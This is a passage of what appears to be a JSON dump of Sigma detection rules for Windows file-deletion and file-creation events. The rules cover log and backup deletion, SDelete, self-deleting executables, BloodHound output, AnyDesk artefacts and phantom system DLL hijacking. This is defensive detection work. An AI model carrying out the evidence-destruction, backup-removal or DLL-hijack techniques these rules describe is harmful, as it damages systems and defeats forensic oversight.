    "content": "title: Backup Files Deleted\nid: 06125661-3814-4e03-bfa2-1e4411c60ac3\nstatus: test\ndescription: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files\nauthor: frack113\ndate: 2022-01-02\nmodified: 2023-02-15\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wt.exe'\n            - '\\rundll32.exe'\n            - '\\regsvr32.exe'\n        TargetFilename|endswith:\n            - '.VHD'\n            - '.bac'\n            - '.bak'\n            - '.wbcat'\n            - '.bkf'\n            - '.set'\n            - '.win'\n            - '.dsk'\n    condition: selection\nfalsepositives:\n    - Legitimate usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml",
    "content": "title: EventLog EVTX File Deleted\nid: 63c779ba-f638-40a0-a593-ddd45e8b1ddc\nstatus: test\ndescription: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\winevt\\Logs\\'\n        TargetFilename|endswith: '.evtx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml",
    "content": "title: Exchange PowerShell Cmdlet History Deleted\nid: a55349d8-9588-4c5a-8e3b-1925fe2a4ffe\nstatus: test\ndescription: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: '\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\'\n        TargetFilename|contains: '_Cmdlet_'\n    condition: selection\nfalsepositives:\n    - Possible FP during log rotation\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml",
    "content": "title: IIS WebServer Access Logs Deleted\nid: 3eb8c339-a765-48cc-a150-4364c04652bf\nrelated:\n    - id: 0649be4a-aeb0-45b0-b89e-7f1668f6d9c0\n      type: similar\nstatus: test\ndescription: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html\nauthor: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-16\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\inetpub\\logs\\LogFiles\\'\n        TargetFilename|endswith: '.log'\n    condition: selection\nfalsepositives:\n    - During uninstallation of the IIS service\n    - During log rotation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_own_image.yml",
    "content": "title: Process Deletion of Its Own Executable\nid: f01d1f70-cd41-42ec-9c0b-26dd9c22bf29\nstatus: test\ndescription: |\n    Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.\nreferences:\n    - https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion\nauthor: Max Altgelt (Nextron Systems)\ndate: 2024-09-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|fieldref: Image\n    condition: selection\nfalsepositives:\n    - Some false positives are to be expected from uninstallers.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml",
    "content": "title: PowerShell Console History Logs Deleted\nid: ff301988-c231-4bd0-834c-ac9d73b86586\nstatus: test\ndescription: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\PSReadLine\\ConsoleHost_history.txt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml",
    "content": "title: Prefetch File Deleted\nid: 0a1f9d29-6465-4776-b091-7f43b26e4c89\nstatus: test\ndescription: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\n    - https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/\nauthor: Cedric MAURUGEON\ndate: 2021-09-29\nmodified: 2024-01-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|contains: ':\\Windows\\Prefetch\\'\n        TargetFilename|endswith: '.pf'\n    filter_main_svchost:\n        Image|endswith: ':\\windows\\system32\\svchost.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml",
    "content": "title: TeamViewer Log File Deleted\nid: b1decb61-ed83-4339-8e95-53ea51901720\nstatus: test\ndescription: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\nauthor: frack113\ndate: 2022-01-16\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|contains: '\\TeamViewer_'\n        TargetFilename|endswith: '.log'\n    filter:\n        Image: C:\\Windows\\system32\\svchost.exe\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml",
    "content": "title: Tomcat WebServer Logs Deleted\nid: 270185ff-5f50-4d6d-a27f-24c3b8c9fef8\nstatus: test\ndescription: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\n    - https://linuxhint.com/view-tomcat-logs-windows/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-16\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\Tomcat'\n            - '\\logs\\'\n        TargetFilename|contains:\n            - 'catalina.'\n            - '_access_log.'\n            - 'localhost.'\n    condition: selection\nfalsepositives:\n    - During uninstallation of the tomcat server\n    - During log rotation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml",
    "content": "title: File Deleted Via Sysinternals SDelete\nid: 6ddab845-b1b8-49c2-bbf7-1a11967f64bc\nstatus: test\ndescription: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/9\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.AAA'\n            - '.ZZZ'\n    filter_wireshark:\n        TargetFilename|endswith: '\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml",
    "content": "title: Unusual File Deletion by Dns.exe\nid: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0\nrelated:\n    - id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 # FileChange version\n      type: similar\nstatus: test\ndescription: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-27\nmodified: 2023-02-15\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dns.exe'\n    filter:\n        TargetFilename|endswith: '\\dns.log'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml",
    "content": "title: ADS Zone.Identifier Deleted By Uncommon Application\nid: 3109530e-ab47-4cc6-a953-cac5ebcc93ae\nrelated:\n    - id: 7eac0a16-5832-4e81-865f-0268a6d19e4b\n      type: similar\nstatus: test\ndescription: Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.\nreferences:\n    - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-04\nmodified: 2025-07-04\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|endswith: ':Zone.Identifier'\n    filter_main_generic:\n        # Note: in some envs this activity might be performed by other software. Apply additional filters as necessary\n        Image:\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\explorer.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_optional_browsers_chrome:\n        Image:\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_browsers_firefox:\n        Image:\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_browsers_msedge:\n        Image:\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n            - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other third party applications not listed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml",
    "content": "title: ADSI-Cache File Creation By Uncommon Tool\nid: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb\nstatus: test\ndescription: Detects the creation of an \"Active Directory Schema Cache File\" (.sch) file by an uncommon tool.\nreferences:\n    - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961\n    - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/\n    - https://github.com/fox-it/LDAPFragger\nauthor: xknow @xknow_infosec, Tim Shelton\ndate: 2019-03-24\nmodified: 2023-10-18\ntags:\n    - attack.t1001.003\n    - attack.command-and-control\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Local\\Microsoft\\Windows\\SchCache\\'\n        TargetFilename|endswith: '.sch'\n    filter_main_generic:\n        - Image|endswith:\n              - ':\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe'\n              - ':\\Windows\\CCM\\CcmExec.exe'\n              - ':\\windows\\system32\\dllhost.exe'\n              - ':\\Windows\\system32\\dsac.exe'\n              - ':\\Windows\\system32\\efsui.exe'\n              - ':\\windows\\system32\\mmc.exe'\n              - ':\\windows\\system32\\svchost.exe'\n              - ':\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n              - ':\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe'\n        - Image|contains:\n              - ':\\Windows\\ccmsetup\\autoupgrade\\ccmsetup' # C:\\Windows\\ccmsetup\\autoupgrade\\ccmsetup.TMC00002.40.exe\n              - ':\\Program Files\\SentinelOne\\Sentinel Agent' # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.7.7.40005\\SentinelAgent.exe\n    filter_main_office:\n        Image|contains|all:\n            - ':\\Program Files\\'\n            - '\\Microsoft Office'\n        Image|endswith: '\\OUTLOOK.EXE'\n    filter_optional_ldapwhoami:\n        Image|endswith: '\\LANDesk\\LDCLient\\ldapwhoami.exe'\n    filter_optional_citrix:\n        # Example:\n        #   TargetFilename=C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Windows\\SchCache\\REDACTED.com.sch\n        Image|endswith: ':\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml",
    "content": "title: Advanced IP Scanner - File Event\nid: fed85bf9-e075-4280-9159-fbe8a023d6fa\nrelated:\n    - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f\n      type: derived\nstatus: test\ndescription: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.\nreferences:\n    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\n    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\n    - https://labs.f-secure.com/blog/prelude-to-ransomware-systembc\n    - https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf\n    - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer\nauthor: '@ROxPinTeddy'\ndate: 2020-05-12\nmodified: 2022-11-29\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\Advanced IP Scanner 2'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative use\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_anydesk_artefact.yml",
    "content": "title: Anydesk Temporary Artefact\nid: 0b9ad457-2554-44c1-82c2-d56a99c42377\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-11\nmodified: 2024-07-20\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\AppData\\Roaming\\AnyDesk\\user.conf'\n            - '\\AppData\\Roaming\\AnyDesk\\system.conf'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml",
    "content": "title: Suspicious Binary Writes Via AnyDesk\nid: 2d367498-5112-4ae5-a06a-96e7bc33a211\nstatus: test\ndescription: |\n    Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\n    According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\n    which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-28\nmodified: 2025-02-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\AnyDesk.exe'\n            - '\\AnyDeskMSI.exe'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_dlls:\n        TargetFilename|endswith: '\\gcapi.dll'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_arcsoc_susp_file_created.yml",
    "content": "title: Suspicious File Created by ArcSOC.exe\nid: e890acee-d488-420e-8f20-d9b19b3c3d43\nstatus: experimental\ndescription: |\n    Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS\n    server, creates a file with suspicious file type, indicating that it may be an executable, script file,\n    or otherwise unusual.\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/\n    - https://enterprise.arcgis.com/en/server/12.0/administer/windows/inside-an-arcgis-server-site.htm\nauthor: Micah Babinski\ndate: 2025-11-25\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1127\n    - attack.t1105\n    - attack.t1133\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ArcSOC.exe'\n        TargetFilename|endswith:\n            - '.ahk'\n            - '.aspx'\n            - '.au3'\n            - '.bat'\n            - '.cmd'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.js'\n            - '.ps1'\n            - '.py'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml",
    "content": "title: Assembly DLL Creation Via AspNetCompiler\nid: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\nrelated:\n    - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\n      type: similar\n    - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\n      type: similar\n    - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of new DLL assembly files by \"aspnet_compiler.exe\", which could be a sign of \"aspnet_compiler\" abuse to proxy execution through a build provider.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-14\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\aspnet_compiler.exe'\n        TargetFilename|contains|all:\n            - '\\Temporary ASP.NET Files\\'\n            - '\\assembly\\tmp\\'\n            - '.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate assembly compilation using a build provider\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_bloodhound_collection.yml",
    "content": "title: BloodHound Collection Files\nid: 02773bed-83bf-469f-b7ff-e676e7d78bab\nstatus: test\ndescription: Detects default file names outputted by the BloodHound collection tool SharpHound\nreferences:\n    - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection\nauthor: C.J. May\ndate: 2022-08-09\nmodified: 2026-02-19\ntags:\n    - attack.discovery\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - 'BloodHound.zip'\n            - '_computers.json'\n            - '_containers.json'\n            # - '_domains.json'  # prone to false positives with ProbabilisticRevealTokenRegistry function in Google Chrome\n            - '_gpos.json'\n            - '_groups.json'\n            - '_ous.json'\n            - '_users.json'\n    filter_optional_ms_winapps:\n        Image|endswith: '\\svchost.exe'\n        TargetFilename|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.'\n        TargetFilename|endswith: '\\pocket_containers.json'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_comodo_itsm_potentially_suspicious_file_creation.yml",
    "content": "title: Potentially Suspicious File Creation by OpenEDR's ITSMService\nid: 9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d\nstatus: experimental\ndescription: |\n    Detects the creation of potentially suspicious files by OpenEDR's ITSMService process.\n    The ITSMService is responsible for remote management operations and can create files on the system through the Process Explorer or file management features.\n    While legitimate for IT operations, creation of executable or script files could indicate unauthorized file uploads, data staging, or malicious file deployment.\nauthor: '@kostastsale'\ndate: 2026-02-19\nreferences:\n    - https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - attack.lateral-movement\n    - attack.t1570\n    - attack.t1219\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_process:\n        Image|endswith: '\\COMODO\\Endpoint Manager\\ITSMService.exe'\n    selection_suspicious_extensions:\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.cmd'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.js'\n            - '.pif'\n            - '.ps1'\n            - '.rar'\n            - '.scr'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate OpenEDR file management operations\n    - Authorized remote file uploads by IT administrators\n    - Software deployment through OpenEDR console\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml",
    "content": "title: EVTX Created In Uncommon Location\nid: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb\nstatus: test\ndescription: |\n    Detects the creation of new files with the \".evtx\" extension in non-common or non-standard location.\n    This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.\n    Note that backup software and legitimate administrator might perform similar actions during troubleshooting.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key\nauthor: D3F7A5105\ndate: 2023-01-02\nmodified: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: The \".evtx\" extension should be monitored via a Sysmon configuration. Example: <TargetFilename condition=\"end with\">.evtx<TargetFilename>'\ndetection:\n    selection:\n        TargetFilename|endswith: '.evtx'\n    filter_main_path:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\winevt\\Logs\\'\n    filter_main_baseimage:\n        TargetFilename|startswith: 'C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\'\n        TargetFilename|endswith: '\\Windows\\System32\\winevt\\Logs\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrator or backup activity\n    - An unknown bug seems to trigger the Windows \"svchost\" process to drop EVTX files in the \"C:\\Windows\\Temp\" directory in the form \"<log_name\">_<uuid>.evtx\". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml",
    "content": "title: Creation Of Non-Existent System DLL\nid: df6ecb8b-7822-4f4b-b412-08f524b4576c\nrelated:\n    - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of specific system DLL files that are  usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.\n    Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.\n    Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.\nreferences:\n    - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html\n    - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc\n    - https://github.com/Wh04m1001/SysmonEoP\n    - https://itm4n.github.io/cdpsvc-dll-hijacking/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n    - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/\n    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\n    - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n    - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/\n    - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/\n    - https://x.com/0gtweet/status/1564131230941122561\nauthor: Nasreddine Bencherchali (Nextron Systems), fornotes\ndate: 2022-12-01\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\Windows\\System32\\axeonoffhelper.dll'\n            - ':\\Windows\\System32\\cdpsgshims.dll'\n            - ':\\Windows\\System32\\oci.dll'\n            - ':\\Windows\\System32\\offdmpsvc.dll'\n            - ':\\Windows\\System32\\shellchromeapi.dll'\n            - ':\\Windows\\System32\\TSMSISrv.dll'\n            - ':\\Windows\\System32\\TSVIPSrv.dll'\n            - ':\\Windows\\System32\\wbem\\wbemcomn.dll'\n            - ':\\Windows\\System32\\WLBSCTRL.dll'\n            - ':\\Windows\\System32\\wow64log.dll'\n            - ':\\Windows\\System32\\WptsExtensions.dll'\n            - '\\SprintCSP.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_deno.yml",
    "content": "title: Suspicious Deno File Written from Remote Source\nid: 6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e\nstatus: experimental\ndescription: |\n    Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.\n    This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.\nreferences:\n    - https://taggart-tech.com/evildeno/\nauthor: Josh Nickels, Michael Taggart\ndate: 2025-05-22\ntags:\n    - attack.execution\n    - attack.t1204\n    - attack.t1059.007\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_path:\n        TargetFilename|contains:\n            - '\\deno\\gen\\'\n            - '\\deno\\remote\\https\\'\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\'\n    condition: selection_path\nfalsepositives:\n    - Legitimate usage of deno to request a file or bring a DLL to a host\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml",
